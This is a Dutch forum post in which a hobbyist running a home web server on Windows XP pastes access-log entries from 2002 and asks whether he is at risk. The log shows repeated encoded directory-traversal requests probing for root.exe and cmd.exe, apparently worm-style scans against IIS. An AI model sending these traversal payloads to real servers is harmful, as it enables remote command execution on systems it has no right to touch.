Ok, ik heb sind een paar dagen een html server(tje) draaien, voor de fun en voor het makkelijk online gooien van plaatjes. Ip wordt geregeld via dyndns.org
Nu zat ik mijn log eens door te nemen en zag daar een aantal keren het volgende voor bij komen:
Voor zover ik het kon traceren waren het "aanvallen" uit Iran en Nederland
Ik hoeverre is mijn pc (xp prof) met "dino's webserver" gevoelig voor dit soort (script) aanvallen. Maw moet ik het gewoon links laten liggen en rustig gaan slapen of de html server platgooien
wie o wie heeft hier verstand van?
Nu zat ik mijn log eens door te nemen en zag daar een aantal keren het volgende voor bij komen:
dit is 1 van de aantal keer. Het is elke keer haast hetzelfde op af en toe de volgoorde na en (natuurlijk) het ip adres.31-1-2002 17:45:35:5: GET /scripts/root.exe Requested by: 213.29.60.5
31-1-2002 17:45:36:6: GET /MSADC/root.exe Requested by: 213.29.60.5
31-1-2002 17:45:37:7: GET /c/winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:39:8: GET /d/winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:40:9: GET /scripts/..%255c../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:41:10: GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:43:11: GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:44:12: GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:46:13: GET /scripts/..%c1%1c../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:47:14: GET /scripts/..%c0%2f../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:48:15: GET /scripts/..%c0%af../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:50:16: GET /scripts/..%c1%9c../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:51:17: GET /scripts/..%%35%63../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:52:18: GET /scripts/..%%35c../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:54:19: GET /scripts/..%25%35%63../winnt/system32/cmd.exe Requested by: 213.29.60.5
31-1-2002 17:45:55:20: GET /scripts/..%252f../winnt/system32/cmd.exe Requested by: 213.29.60.5
Voor zover ik het kon traceren waren het "aanvallen" uit Iran en Nederland
Ik hoeverre is mijn pc (xp prof) met "dino's webserver" gevoelig voor dit soort (script) aanvallen. Maw moet ik het gewoon links laten liggen en rustig gaan slapen of de html server platgooien
wie o wie heeft hier verstand van?
tja, wat hier stond heb ik al lang niet meer...